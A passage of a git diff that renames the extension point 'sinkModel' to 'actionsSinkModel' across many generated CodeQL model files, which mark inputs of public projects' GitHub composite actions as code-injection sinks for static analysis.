a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openvinotoolkit/openvino", "*", "input.skip_when_only_listed_files_changed", "code-injection", "generated"] - ["openvinotoolkit/openvino", "*", "input.skip_when_only_listed_labels_set", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml index 564961fc600..32040ef84ea 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.layout", "code-injection", "generated"] - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.out_layout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml index 8876184a0c1..b258ea1ce2d 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openzeppelin/openzeppelin-contracts", "*", "input.layout", "code-injection", "generated"] - ["openzeppelin/openzeppelin-contracts", "*", "input.out_layout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml index 7a389e89e53..c0a51345ae6 100644 --- a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml +++ b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oppia/oppia", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml index ca23beb6e04..f362cd1f72b 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oracle/graal", "*", "input.components", "code-injection", "generated"] - ["oracle/graal", "*", "input.native-images", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml index 9ddc6606a6d..35474e6c68f 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oracle/truffleruby", "*", "input.archive", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml index cd04e9c8b34..ce961ee6a75 100644 --- a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml +++ b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["orhun/git-cliff", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml index d986c331226..9ad4bb30666 100644 --- a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml +++ b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oven-sh/bun", "*", "input.download-url", "code-injection", "generated"] - ["oven-sh/bun", "*", "input.bun-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml index 9b30c6599c1..5fca46427e0 100644 --- a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["owntracks/android", "*", "input.name", "code-injection", "generated"] - ["owntracks/android", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml index 0089d9ca75d..9f0fecbe10b 100644 --- a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml +++ b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pandas-dev/pandas", "*", "input.meson_args", "code-injection", "generated"] - ["pandas-dev/pandas", "*", "input.editable", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml index d64d7c38a01..cadf01dbff1 100644 --- a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pardeike/harmony", "*", "input.architecture", "code-injection", "generated"] - ["pardeike/harmony", "*", "input.build_configuration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml index 55a87e2df67..ec4fc1da053 100644 --- a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pennylaneai/pennylane", "*", "input.requirements_file", "code-injection", "generated"] - ["pennylaneai/pennylane", "*", "input.additional_pip_packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml index 158aafbd115..e6530a19d97 100644 --- a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml +++ b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["phalcon/cphalcon", "*", "input.target-name", "code-injection", "generated"] - ["phalcon/cphalcon", "*", "input.ext-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml index ff12a54e97a..0bae4e91cde 100644 --- a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml +++ b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["philosowaffle/peloton-to-garmin", "*", "input.framework", "code-injection", "generated"] - ["philosowaffle/peloton-to-garmin", "*", "input.os", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["philosowaffle/peloton-to-garmin", "*", "input.os", "output.artifact_name", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml index 1a92afe11a4..0acb53ba1d3 100644 --- a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml +++ b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["php/php-src", "*", "input.jitType", "code-injection", "generated"] - ["php/php-src", "*", "input.runTestsParameters", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml index 38f2399b368..f1b755e796b 100644 --- a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml +++ b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["phpdocumentor/phpdocumentor", "*", "input.passphrase", "code-injection", "generated"] - ["phpdocumentor/phpdocumentor", "*", "input.secret-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml index 36e983b8039..7d1733d647a 100644 --- a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml +++ b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pinecone-io/pinecone-python-client", "*", "input.googleapis_common_protos_version", "code-injection", "generated"] - ["pinecone-io/pinecone-python-client", "*", "input.protobuf_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml index 006a53e8376..4bf33c9a343 100644 --- a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml +++ b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pixijs/pixijs", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml index 5410cb3ff30..9ca004a7c15 100644 --- a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml +++ b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["posthog/posthog", "*", "input.group", "code-injection", "generated"] - ["posthog/posthog", "*", "input.concurrency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/primer_react.model.yml b/ql/lib/ext/generated/composite-actions/primer_react.model.yml index 124b3cf2a5a..fc3870d89a8 100644 --- a/ql/lib/ext/generated/composite-actions/primer_react.model.yml +++ b/ql/lib/ext/generated/composite-actions/primer_react.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["primer/react", "*", "input.token", "code-injection", "generated"] - ["primer/react", "*", "input.schedule-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml index 8542583f3d9..1d621562771 100644 --- a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml +++ b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["project-chip/connectedhomeip", "*", "input.with", "code-injection", "generated"] - ["project-chip/connectedhomeip", "*", "input.action", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml index e85e58fb40a..f09b364127e 100644 --- a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml +++ b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["projectnessie/nessie", "*", "input.job-name", "code-injection", "generated"] - ["projectnessie/nessie", "*", "input.java-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/psf_black.model.yml b/ql/lib/ext/generated/composite-actions/psf_black.model.yml index d2005f3788a..56e7b814231 100644 --- a/ql/lib/ext/generated/composite-actions/psf_black.model.yml +++ b/ql/lib/ext/generated/composite-actions/psf_black.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["psf/black", "*", "input.summary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml index 7340dfccdd0..9f953b32ab1 100644 --- a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyca/cryptography", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml index 70022866bdd..257b77bc2c3 100644 --- a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyg-team/pytorch/geometric", "*", "input.torchvision-version", "code-injection", "generated"] - ["pyg-team/pytorch/geometric", "*", "input.cuda-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml index f7bd43cbc1e..49f2f86907f 100644 --- a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml +++ b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["python-poetry/poetry", "*", "input.args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml index d85a35580b6..1e33c5e540a 100644 --- a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml +++ b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["python/mypy", "*", "input.install_project_dependencies", "code-injection", "generated"] - ["python/mypy", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml index ee0b51c72b4..cfbf15549c4 100644 --- a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["quarto-dev/quarto-cli", "*", "input.keychain-pw", "code-injection", "generated"] - ["quarto-dev/quarto-cli", "*", "input.keychain", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml index 524a1f54ae4..24730af3d77 100644 --- a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml +++ b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["quay/clair", "*", "input.tag", "code-injection", "generated"] - ["quay/clair", "*", "input.repo", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml index 310f11ed160..6be5abd09dd 100644 --- a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml +++ b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["quickwit-oss/quickwit", "*", "input.target", "code-injection", "generated"] - ["quickwit-oss/quickwit", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml index 441b824581c..145b6f0d0e3 100644 --- a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["r-lib/actions", "*", "input.lockfile-create-lib", "code-injection", "generated"] - ["r-lib/actions", "*", "input.dependencies", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml index 19f9f7a03bb..c8b05bfd904 100644 --- a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml +++ b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["randombit/botan", "*", "input.target", "code-injection", "generated"] - ["randombit/botan", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml index 1ca71afacc7..04c218a76c1 100644 --- a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml +++ b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["raspberrypi/documentation", "*", "input.secondary_host", "code-injection", "generated"] - ["raspberrypi/documentation", "*", "input.destination", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml index 9f0ff2c86de..5447d4b7e2e 100644 --- a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml +++ b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ray-project/kuberay", "*", "input.ray_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml index abb6c432aef..825ce27511d 100644 --- a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["readthedocs/actions", "*", "input.single-version", "code-injection", "generated"] - ["readthedocs/actions", "*", "input.platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml index 6548880f59e..8f3e49c9768 100644 --- a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml +++ b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["reflex-dev/reflex", "*", "input.create-venv-at-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml index 5401d176051..1937367debc 100644 --- a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml +++ b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["renovatebot/renovate", "*", "input.node-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml index 70cf81f1b78..01b77b7ccc6 100644 --- a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml +++ b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rethinkdb/rethinkdb", "*", "input.command", "code-injection", "generated"] - ["rethinkdb/rethinkdb", "*", "input.install_command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml index eccccba83fe..edbd28d401b 100644 --- a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml +++ b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["risc0/risc0", "*", "input.key", "code-injection", "generated"] - ["risc0/risc0", "*", "input.components", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml index b7133aae304..4b31bd66c5a 100644 --- a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rocketchat/rocket.chat", "*", "input.build-containers", "code-injection", "generated"] - ["rocketchat/rocket.chat", "*", "input.release", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml index 26d7b448269..a186fa070b0 100644 --- a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml +++ b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rook/rook", "*", "input.use-tmate", "code-injection", "generated"] - ["rook/rook", "*", "input.kubernetes-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml index 7600cd4bdde..92ee2971e3a 100644 --- a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml +++ b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["roots/trellis", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml index dd79b0845dd..07b8e96bfe2 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ruby/debug", "*", "input.report-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml index 71bdd001458..2a2a5baab45 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ruby/ruby", "*", "input.builddir", "code-injection", "generated"] - ["ruby/ruby", "*", "input.srcdir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml index 3b3262f93a9..274fab01e92 100644 --- a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml +++ b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_SERVER", "code-injection", "generated"] - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_PASS", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml index b30d898dcc1..3671de9e58a 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["saltstack/salt", "*", "input.version", "code-injection", "generated"] - ["saltstack/salt", "*", "input.upload-chunk-size", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml index 963518a3478..2ef34dac8ba 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["saltstack/salt", "*", "input.version", "output.version", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml index 979a9aca5c2..d76f20031e7 100644 --- a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml +++ b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sap/sapmachine", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml index b180a319baa..eccb5dae2bd 100644 --- a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["scala-native/scala-native", "*", "input.llvm-version", "code-injection", "generated"] - ["scala-native/scala-native", "*", "input.scala-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml index fb5fa4d8e4e..3cbd3330ccd 100644 --- a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml +++ b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["scitools/iris", "*", "input.version", "code-injection", "generated"] - ["scitools/iris", "*", "input.install_packages", "code-injection", "generated"] diff --git 